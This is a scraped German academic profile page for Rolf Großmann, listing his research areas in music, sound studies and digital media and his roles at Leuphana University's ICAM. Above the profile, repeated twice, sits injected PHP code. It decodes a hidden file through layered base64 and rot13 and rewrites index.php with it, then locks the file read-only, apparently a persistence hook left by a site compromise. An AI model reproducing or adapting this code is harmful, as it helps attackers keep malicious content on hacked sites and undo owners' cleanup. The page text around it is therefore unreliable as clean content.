$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Rolf Großmann – Auditive Medienkulturen

Rolf Großmann

Forschungsgebiete:

  • Technikkultur und Medienästhetik der Musik,
  • Ästhetik zeitgenössischer Musik (E und U)
  • Auditive Gestaltung in den digitalen Medien
  • Klang und Raum: Installationen, Interface

Aktivitäten:

  • Gründer und Leiter des Schwerpunktbereichs ((audio)) Ästhetische Strategien
    im ICAM an der Leuphana Universität Lüneburg
  • Gründer (zus. mit Martin Warnke) und Geschäftsführender Direktor (2014-2018) des Instituts für Kultur und Ästhetik digitaler Medien (ICAM)
  • dort  Professor für ‚Digitale Medien und auditive Gestaltung‘
  • Verantwortlich für die Lehrgebiete “Musik und auditive Kultur” (BA Kulturwissenschaften); “Sound Studies – Digitale Perspektiven” (MA Kulturwissenschaften – Culture, Arts & Media); Digitale Medien / Kulturinformatik (Minor)

Publikationen (Auswahl):

Studium der Musikpädagogik und -wissenschaft, Germanistik, Philosophie, Physik an den Universitäten Bonn, Siegen und Gießen; Promotion 1990 über „Musik als Kommunikation“.

s.a. http://www.leuphana.de/rolf-grossmann.html